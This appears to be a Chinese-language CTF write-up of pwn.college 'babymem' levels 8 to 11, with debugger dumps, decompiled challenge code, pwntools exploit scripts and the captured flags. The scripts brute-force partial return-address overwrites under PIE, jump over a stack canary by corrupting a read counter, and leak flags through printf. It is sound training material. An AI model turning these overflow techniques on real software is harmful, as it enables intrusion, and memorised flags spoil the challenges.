◂— 0xa /* '\n' */ n: 1
26 collapsed lines
0x555555556234 <challenge+1527> cmp dword ptr [rbp - 0x14], 0 0x555555556238 <challenge+1531> jns challenge+1577 <challenge+1577>
0x55555555623a <challenge+1533> call __errno_location@plt <__errno_location@plt>
0x55555555623f <challenge+1538> mov eax, dword ptr [rax] 0x555555556241 <challenge+1540> mov edi, eax 0x555555556243 <challenge+1542> call strerror@plt <strerror@plt>
0x555555556248 <challenge+1547> mov rsi, rax 0x55555555624b <challenge+1550> lea rdi, [rip + 0x21b6] RDI => 0x555555558408 ◂— 'ERROR: Failed to read input -- %s!\n' 0x555555556252 <challenge+1557> mov eax, 0 EAX => 0 0x555555556257 <challenge+1562> call printf@plt <printf@plt>─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffd130 —▸ 0x7fffffffd160 ◂— 001:0008│-078 0x7fffffffd138 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f0 ◂— 'SHELL=/usr/bin/zsh'02:0010│-070 0x7fffffffd140 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6ba ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-8-0'03:0018│-068 0x7fffffffd148 ◂— 0x1f7e3070b04:0020│-060 0x7fffffffd150 —▸ 0x555555558770 ◂— 0x2023232300232323 /* '###' */05:0028│-058 0x7fffffffd158 ◂— 0x6eb06:0030│ rax rdi 0x7fffffffd160 ◂— 007:0038│-048 0x7fffffffd168 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x55555555622f challenge+1522 1 0x55555555649b main+198 2 0x7ffff7dcae08 3 0x7ffff7dcaecc __libc_start_main+140 4 0x55555555526e _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> i frameStack level 0, frame at 0x7fffffffd1c0: rip = 0x55555555622f in challenge; saved rip = 0x55555555649b called by frame at 0x7fffffffe1f0 Arglist at 0x7fffffffd1b0, args: Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0 Saved registers: rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8pwndbg> dist 0x7fffffffd160 0x7fffffffd1b80x7fffffffd160->0x7fffffffd1b8 is 0x58 bytes (0xb words)pwndbg>
from pwn import context, ELF, log, pause, process, random, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-8-0"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+1421b *challenge+1502c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
null = b"\x00"padding = b"".ljust(0x58 - 0x1, b"A")fixed_offset = b"\x3c"possible_bytes = [bytes([i]) for i in range(0x0B, 0x10B, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred: {e}")
while True: try: target = launch(debug=False)
payload = null + padding payload += fixed_offset + random.choice(possible_bytes) log.info(f"Trying payload: {payload.hex()}")
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{82SpQ2oiZjETn254hnZR69O97tP.01MwMDL5cTNxgzW}
Level 8.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.
from pwn import context, ELF, log, pause, process, random, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-8-1"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+259b *challenge+326c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
null = b"\x00"padding = b"".ljust(0x68 - 0x1, b"A")fixed_offset = b"\x5a"possible_bytes = [bytes([i]) for i in range(0x0F, 0x10F, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred: {e}")
while True: try: target = launch(debug=False)
payload = null + padding payload += fixed_offset + random.choice(possible_bytes) log.info(f"Trying payload: {payload.hex()}")
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{orn4FN_Dc8Po8bG2OX-G3dcj8Pr.0FNwMDL5cTNxgzW}
Level 9.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time in a PIE binary with a stack canary. Be warned, this requires careful and clever payload construction!
8 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int v3; // eax int *v4; // rax char *v5; // rax _QWORD v7[3]; // [rsp+0h] [rbp-80h] BYREF int v8; // [rsp+1Ch] [rbp-64h] int v9; // [rsp+24h] [rbp-5Ch] unsigned __int64 v10; // [rsp+28h] [rbp-58h] BYREF char *v11; // [rsp+30h] [rbp-50h] int *v12; // [rsp+38h] [rbp-48h] _QWORD v13[6]; // [rsp+40h] [rbp-40h] BYREF int v14; // [rsp+70h] [rbp-10h] BYREF unsigned __int64 v15; // [rsp+78h] [rbp-8h] __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF3 collapsed lines
v8 = a1; v7[2] = a2; v7[1] = a3; v15 = __readfsqword(0x28u); memset(v13, 0, sizeof(v13)); v14 = 0; v11 = (char *)v13; v12 = &v14; v10 = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v7;57 collapsed lines
bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v7) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", v11); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 48); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win_authed() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)v11); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)v11 + 8, 48); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)v11 - 48); puts("and 8 that will overwrite the return address).\n"); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ ) cp_ -= 8LL; puts("While canaries are enabled, this program reads your input 1 byte at a time,"); puts("tracking how many bytes have been read and the offset from your input buffer"); puts("to read the byte to using a local variable on the stack."); puts("The code for doing this looks something like:"); puts(" while (n < size) {"); puts(" n += read(0, input + n, 1);"); puts(" }"); puts("As it turns out, you can use this local variable `n` to jump over the canary."); printf("Your input buffer is stored at %p, and this local variable `n`\n", v11); printf("is stored %d bytes after it at %p.\n\n", (_DWORD)v12 - (_DWORD)v11, v12); puts("When you overwrite `n`, you will change the program's understanding of"); puts("how many bytes it has read in so far, and when it runs `read(0, input + n, 1)`"); puts("again, it will read into an offset that you control."); puts("This will allow you to reposition the write *after* the canary, and write"); puts("into the return address!\n"); puts("The payload size is deceptively simple."); puts("You don't have to think about how many bytes you will end up skipping:"); puts("with the while loop described above, the payload size marks the"); puts("*right-most* byte that will be read into."); puts("As far as this challenge is concerned, there is no difference between bytes"); puts("\"skipped\" by fiddling with `n` and bytes read in normally: the values"); puts("of `n` and `size` are all that matters to determine when to stop reading,"); puts("*not* the number of bytes actually read in.\n"); puts("That being said, you *do* need to be careful on the sending side: don't send"); puts("the bytes that you're effectively skipping!\n"); puts("Because the binary is position independent, you cannot know"); puts("exactly where the win_authed() function is located."); puts("This means that it is not clear what should be written into the return address.\n"); printf("Payload size: "); __isoc99_scanf("%lu", &v10); printf("You have chosen to send %lu bytes of input!\n", v10); printf("This will allow you to write from %p (the start of the input buffer)\n", v11); printf("right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", &v11[v10], v10 - 48);38 collapsed lines
printf("Of these, you will overwrite %d bytes into the return address.\n", v10 + (_DWORD)v11 - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("Overwriting the entire return address is fine when we know"); puts("the whole address, but here, we only really know the last three nibbles."); puts("These nibbles never change, because pages are aligned to 0x1000."); puts("This gives us a workaround: we can overwrite the least significant byte"); puts("of the saved return address, which we can know from debugging the binary,"); puts("to retarget the return to main to any instruction that shares the other 7 bytes."); puts("Since that last byte will be constant between executions (due to page alignment),"); puts("this will always work."); puts("If the address we want to redirect execution to is a bit farther away from"); puts("the saved return address, and we need to write two bytes, then one of those"); puts("nibbles (the fourth least-significant one) will be a guess, and it will be"); puts("incorrect 15 of 16 times."); puts("This is okay: we can just run our exploit a few times until it works"); puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times)."); puts("One caveat in this challenge is that the win_authed() function must first auth:"); puts("it only lets you win if you provide it with the argument 0x1337."); puts("Speifically, the win_authed() function looks something like:"); puts(" void win_authed(int token)"); puts(" {"); puts(" if (token != 0x1337) return;"); puts(" puts(\"You win! Here is your flag: \");"); puts(" sendfile(1, open(\"/flag\", 0), 0, 256);"); puts(" puts(\"\");"); puts(" }"); puts(byte_440D); puts("So how do you pass the check? There *is* a way, and we will cover it later,"); puts("but for now, we will simply bypass it! You can overwrite the return address"); puts("with *any* value (as long as it points to executable code), not just the start"); puts("of functions. Let's overwrite past the token check in win!\n"); puts("To do this, we will need to analyze the program with objdump, identify where"); puts("the check is in the win_authed() function, find the address right after the check,"); puts("and write that address over the saved return address.\n"); puts("Go ahead and find this address now. When you're ready, input a buffer overflow"); printf( "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n", (const void *)rp_, rp_ - (_DWORD)v11); puts("with the correct value.\n"); printf("Send your payload (up to %lu bytes)!\n", v10); while ( *v12 < v10 ) { printf("About to read 1 byte to %p, this is %d bytes away from the start of the input buffer.\n", &v11[*v12], *v12); v3 = read(0, &v11[*v12], 1uLL); *v12 += v3; } v9 = *v12; if ( v9 < 0 ) {32 collapsed lines
v4 = __errno_location(); v5 = strerror(*v4); printf("ERROR: Failed to read input -- %s!\n", v5); exit(1); } printf("You sent %d bytes!\n", v9); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", v11); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of the number of bytes read counter and read offset is %p.\n", v12); printf("- the address of win_authed() is %p.\n", win_authed); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win_authed() when it returns."); printf("Let's try it now!\n\n"); if ( (unsigned __int64)&v11[v9] > rp_ + 2 ) { puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address."); puts(" This can still work, because I told you the correct address to use for"); puts(" this execution, but you should not rely on that information."); puts(" You can solve this challenge by only overwriting two bytes!"); puts(" "); } puts("Goodbye!"); return 0LL;}
while ( *v12 < v10 ){ printf("About to read 1 byte to %p, this is %d bytes away from the start of the input buffer.\n", &v11[*v12], *v12); v3 = read(0, &v11[*v12], 1uLL); *v12 += v3;}
我们知道 v10
是我们提供的任意大小。程序内部通过一个 while
循环从零开始向 v13
数组读入数据,一次一字节,每次写完后将 *v12
加上本次读入字节数,也就是加一,以此指向下一个内存单元。这个过程一共写 v10
由于读入数据的实现是 read(0, &v11[*v12], 1uLL)
,这会将一个字节读到 &v11[*v12]
如果我们将输入缓冲区填满,再多写入一个字节就会覆盖索引 *v12
不过根据程序逻辑,我们是先判断 *v12 < v10
是否成立,成立则读入一个字节到 &v11[*v12]
,然后将 *v12
加一,回到判断,如果还是小于 v10
这个程序是开启了 Canary 和 PIE 保护的,不过因为数组越界写的漏洞存在,我们可以直接跳过 Canary 覆盖返回地址。因为有 PIE,而我们通过页偏移的方式定位要执行的指令,所以我们最后只需要两个字节来覆盖返回地址。这里需要注意的是,payload 结构是用来填充数组的 padding + 用来重定位写入索引的一字节 + 用来重定位执行流的两字节页偏移。如果我们将这个 payload 大小作为 v10
的话,得到的可输入大小是数组大小加三,但是我们的返回地址肯定在一个比较高的位置,导致 *v12 < v10
这条检测失败,不会去覆盖返回地址。所以为了绕过这个判断,我们实际需要的输入大小应该是用来重定位写入的索引的值加三,那这不够的大小就需要我们通过在 payload 末尾再加一段 padding 实现。当然你也可以手动指定最大输入大小就是了…
from pwn import context, ELF, log, pause, process, random, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-9-0"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+1786b *challenge+1816b *challenge+1825c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
destination = b"\x47"fixed_offset = b"\x84"possible_bytes = [bytes([i]) for i in range(0x06, 0x106, 0x10)]padding = b"".ljust(0x30, b"A") + destinationextra_padding = b"".ljust(0x17, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall() # pause()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred: {e}")
while True: try: target = launch(debug=False)
payload = padding payload += fixed_offset + random.choice(possible_bytes) payload += extra_padding log.info(f"Trying payload: {payload.hex()}")
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{QccZPJ6VBhlEFtdfJdexxhwYSnh.0VNwMDL5cTNxgzW}
Level 9.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time in a PIE binary with a stack canary. Be warned, this requires careful and clever payload construction!
18 collapsed lines
__int64 challenge(){ int v0; // eax int *v1; // rax char *v2; // rax unsigned __int64 v4; // [rsp+28h] [rbp-88h] BYREF _BYTE *v5; // [rsp+30h] [rbp-80h] int *v6; // [rsp+38h] [rbp-78h] _BYTE v7[96]; // [rsp+40h] [rbp-70h] BYREF int v8; // [rsp+A0h] [rbp-10h] BYREF unsigned __int64 v9; // [rsp+A8h] [rbp-8h]
v9 = __readfsqword(0x28u); memset(v7, 0, sizeof(v7)); v8 = 0; v5 = v7; v6 = &v8; v4 = 0LL; printf("Payload size: "); __isoc99_scanf("%lu", &v4); printf("Send your payload (up to %lu bytes)!\n", v4); while ( *v6 < v4 ) { v0 = read(0, &v5[*v6], 1uLL); *v6 += v0; } if ( *v6 < 0 ) { v1 = __errno_location();7 collapsed lines
v2 = strerror(*v1); printf("ERROR: Failed to read input -- %s!\n", v2); exit(1); } puts("Goodbye!"); return 0LL;}
from pwn import context, ELF, log, pause, process, random, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-9-1"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+212b *challenge+233c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
destination = b"\x77"fixed_offset = b"\xe4"possible_bytes = [bytes([i]) for i in range(0x0F, 0x10F, 0x10)]padding = b"".ljust(0x60, b"A") + destinationextra_padding = b"".ljust(0x17, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall() # pause()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred: {e}")
while True: try: target = launch(debug=False)
payload = padding payload += fixed_offset + random.choice(possible_bytes) payload += extra_padding log.info(f"Trying payload: {payload.hex()}")
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{QfzSsyMdYf7_dP64EnXQ8DrrgQ1.0lNwMDL5cTNxgzW}
Level 10.0
- Category: Pwn
Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!
6 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int v3; // eax int *v4; // rax char *v5; // rax _QWORD v7[3]; // [rsp+0h] [rbp-170h] BYREF int v8; // [rsp+1Ch] [rbp-154h] int v9; // [rsp+24h] [rbp-14Ch] size_t nbytes; // [rsp+28h] [rbp-148h] BYREF void *v11; // [rsp+30h] [rbp-140h] void *buf; // [rsp+38h] [rbp-138h] _BYTE v13[288]; // [rsp+40h] [rbp-130h] BYREF int v14; // [rsp+160h] [rbp-10h] char v15; // [rsp+164h] [rbp-Ch] unsigned __int64 v16; // [rsp+168h] [rbp-8h]7 collapsed lines
__int64 savedregs; // [rsp+170h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+178h] [rbp+8h] BYREF
v8 = a1; v7[2] = a2; v7[1] = a3; v16 = __readfsqword(0x28u); memset(v13, 0, sizeof(v13)); v14 = 0; v15 = 0; v11 = v13; buf = &v13[37]; nbytes = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v7;13 collapsed lines
bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v7) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", v11); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 37); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, the flag will be loaded into memory."); puts("However, at no point will this program actually print the buffer storing the flag."); v3 = open("/flag", 0); read(v3, buf, 0x100uLL); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ )7 collapsed lines
cp_ -= 8LL; printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", v11); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)v11 + nbytes, nbytes - 37); printf("Send your payload (up to %lu bytes)!\n", nbytes); v9 = read(0, v11, nbytes); if ( v9 < 0 ) { v4 = __errno_location();11 collapsed lines
v5 = strerror(*v4); printf("ERROR: Failed to read input -- %s!\n", v5); exit(1); } printf("You sent %d bytes!\n", v9); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", v11); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of the flag is %p.\n", buf); putchar(10); printf("You said: %s\n", (const char *)v11); puts("Goodbye!"); return 0LL;}
4755 .rwsr-xr-x 18k root root 12 Dec 21:43 babymem-level-10-0*0400 .r-------- 57 root root 12 Dec 22:13 /flag
并不会从 /flag
中读到数据。但由于这是个 SUID
程序,运行的时候会以这个程序的所有者的身份运行,而所有者是 root
,那么理应我们可以读取 /flag
才对。这里的问题其实在于内核的保护策略:调试 SUID
程序的时候,Linux 内核会移除 SUID
直接一个 sudo
怼上去看它服不服吧 LMAO。
注意到程序最后使用 printf
将整个 buf
的内容输出。而我们的 flag
在此之前就已经被保存到 buf
中了。所以这里考察的是 printf
在遇到 \x00
所以我们只要使用垃圾值填充到 flag
为什么那么简单……这可是至高的 Level 10!!!
from pwn import ELF, context, gdb, log, pause, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-10-0"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+507c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding = b"".ljust(0x25, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred: {e}")
try: target = launch(debug=False)
payload = padding
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit()except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{cHV80jBzHGyTr_qaE0HdorP-81y.01NwMDL5cTNxgzW}
Level 10.1
- Category: Pwn
Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!
from pwn import ELF, context, gdb, log, pause, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-10-1"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+166c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding = b"".ljust(0x51, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred: {e}")
try: target = launch(debug=False)
payload = padding
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit()except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{4n50Ii5yzf-WULWGzVOqmN3vTgp.0FOwMDL5cTNxgzW}
Level 11.0
- Category: Pwn
Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!
和前面两题差不多,考察点都是 SUID
的性质和看能不能想到 printf
判断字符串结束的机制。利用这个机制来泄漏 flag
和前面两题最大的区别在于这次使用 mmap
映射成功返回起始地址,失败返回 -1
6 collapsed lines
__int64 challenge(){ int *v0; // rax char *v1; // rax int i; // [rsp+2Ch] [rbp-34h] int fd; // [rsp+30h] [rbp-30h] int v5; // [rsp+34h] [rbp-2Ch] size_t nbytes; // [rsp+38h] [rbp-28h] BYREF void *v7; // [rsp+40h] [rbp-20h] void *buf; // [rsp+48h] [rbp-18h] void *v9; // [rsp+50h] [rbp-10h] void *v10; // [rsp+58h] [rbp-8h]
nbytes = 0LL;4 collapsed lines
puts("The challenge() function has just been launched!"); puts("This challenge stores your input buffer in an mmapped page of memory!"); v7 = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL); printf("Called mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v7); puts("In this level, the flag will be loaded into memory."); puts("However, at no point will this program actually print the buffer storing the flag."); puts("Mapping memory for the flag..."); buf = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL); fd = open("/flag", 0); read(fd, buf, 0x400uLL); close(fd); printf("Called mmap(0, 0x1000, 4, MAP_SHARED, open(\"/flag\", 0), 0) = %p\n", buf); for ( i = 0; i <= 2; ++i )2 collapsed lines
{ v10 = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL); printf("Called mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v10); } puts("Memory mapping the input buffer..."); v9 = mmap(0LL, 0x78uLL, 3, 34, 0, 0LL); printf("Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v9); printf("Payload size: "); __isoc99_scanf("%lu", &nbytes);4 collapsed lines
printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", v9); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)v9 + nbytes, nbytes - 120); printf("Send your payload (up to %lu bytes)!\n", nbytes); v5 = read(0, v9, nbytes); if ( v5 < 0 ) { v0 = __errno_location();6 collapsed lines
v1 = strerror(*v0); printf("ERROR: Failed to read input -- %s!\n", v1); exit(1); } printf("You sent %d bytes!\n", v5); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", v9); printf("- the address of the flag is %p.\n", buf); putchar(10); printf("You said: %s\n", (const char *)v9); puts("Goodbye!"); return 0LL;}
alr,让我们调试看看需要多大的 padding:
Breakpoint 1, 0x000055e7d6a8cd2a in challenge ()21 collapsed lines
------- tip of the day (disable with set show-tips off) -------Pwndbg mirrors some of Windbg commands like eq, ew, ed, eb, es, dq, dw, dd, db, ds for writing and reading memoryLEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 0x1f RBX 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0' RCX 0x22 RDX 3 RDI 0 RSI 0x1000 R8 0 R9 0 R10 0 R11 0x202 R12 1 R13 0 R14 0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f R15 0 RBP 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0 RSP 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */ RIP 0x55e7d6a8cd2a (challenge+188) ◂— call 0x55e7d6a8c150────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x55e7d6a8cd2a <challenge+188> call mmap@plt <mmap@plt> addr: 0 len: 0x1000 prot: 3 flags: 0x22 fd: 0 (pipe:[532567]) offset: 028 collapsed lines
0x55e7d6a8cd2f <challenge+193> mov qword ptr [rbp - 0x18], rax 0x55e7d6a8cd33 <challenge+197> mov esi, 0 ESI => 0 0x55e7d6a8cd38 <challenge+202> lea rdi, [rip + 0x1530] RDI => 0x55e7d6a8e26f ◂— 0x67616c662f /* '/flag' */ 0x55e7d6a8cd3f <challenge+209> mov eax, 0 EAX => 0 0x55e7d6a8cd44 <challenge+214> call open@plt <open@plt>
0x55e7d6a8cd49 <challenge+219> mov dword ptr [rbp - 0x30], eax 0x55e7d6a8cd4c <challenge+222> mov rcx, qword ptr [rbp - 0x18] 0x55e7d6a8cd50 <challenge+226> mov eax, dword ptr [rbp - 0x30] 0x55e7d6a8cd53 <challenge+229> mov edx, 0x400 EDX => 0x400 0x55e7d6a8cd58 <challenge+234> mov rsi, rcx─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a9001004:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...05:0028│-038 0x7ffcf78305f8 —▸ 0x7044dd967c80 (putchar+240) ◂— jmp 0x7044dd967bd606:0030│-030 0x7ffcf7830600 ◂— 0x23007:0038│-028 0x7ffcf7830608 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x55e7d6a8cd2a challenge+188 1 0x55e7d6a8d063 main+213 2 0x7044dd90ae08 3 0x7044dd90aecc __libc_start_main+140 4 0x55e7d6a8c20e 